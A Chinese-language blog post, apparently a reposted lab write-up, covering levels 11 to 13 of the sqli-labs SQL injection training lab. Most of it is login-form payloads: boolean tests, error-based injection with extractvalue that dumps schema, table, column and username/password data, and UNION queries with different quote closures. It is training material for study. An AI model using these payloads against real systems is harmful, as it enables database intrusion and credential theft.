数据库
首页 > 数据库> > sqli-labs(11-20)

sqli-labs(11-20)

作者:互联网

less-11

本关还可以使用union联合查询注入和盲注

(1)使用burpsuite抓包,修改参数构造payload。

输入uname=admin' and 1=1--+&passwd=admin&submit=Submit

 

 

 可以登录

(2)输入uname=admin' and 1=2--+&passwd=admin&submit=Submit

 

 

 

发现无法登录,说明注入有效,存在报错型注入,接下来又是重复性的工作,上extractvalue()

(3)爆库

uname=admin' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))--+&passwd=admin&submit=Submit     //通过不断改变limit x,1中x的值就可以爆出数据库中所以的库

 

 

 

 (4)查看当前数据库

uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+&passwd=admin&submit=Submit

 

 

 

 (5)爆表

uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)))--+&passwd=admin&submit=Submit

 

 

 

(6)爆列

uname=admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)))--+&passwd=admin&submit=Submit

 

 

 

 (7)爆数据

uname=admin' and extractvalue(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1)))--+&passwd=admin&submit=Submit

 

 

 

 less-12

1、union联合查询注入

和less-11差不多,改一下闭合方式即可。使用双引号和括号进行闭合

uname=0") union select database(),user()--+&passwd=admin&submit=Submit

 

 

 2、报错注入

报错注入和less-11不太一样。查看源码

 

 

(1)可以看到sql查询语句语句:@sql="SELECT username,password FROM users WHERE username=($uname) and password=($password) LIMIT 0,1";构造一个能闭合语句而且会报错的payload:admin" and extractvalue(1,concat(0x7e,(select database()))) and "

(2)最终admin="admin" and extractvalue(1,concat(0x7e,(select database()))) and " "

    传入后就变成了:@sql="SELECT username,password FROM users WHERE username="admin" and extractvalue(1,concat(0x7e,(select database()))) and " " and password=($passwd) LIMIT 0,1";

    前闭合,中间查询,后面报错,应该是没有问题的这样可以回显:uname=admin" and " &passwd=123456&submit=Submit

 

 

 (3)使用extractvalue进行报错注入。

uname=admin" and extractvalue(1,concat(0x7e,database())) and " &passwd=123456&submit=Submit

 

 

后面老一套就不再重复了

less-13

登录之后发现没有回显信息,所以union联合注入行不通了,只能通过报错注入和盲注

 

 1、报错注入

uname=admin') and extractvalue(1,concat(0x7e,database())) and ('&passwd=123456&submit=Submit

 

 

 后面过程和前面一样

less-14

 

标签:20,extractvalue,uname,admin,0x7e,submit,labs,sqli,passwd
来源: https://www.cnblogs.com/pursue-security/p/15362120.html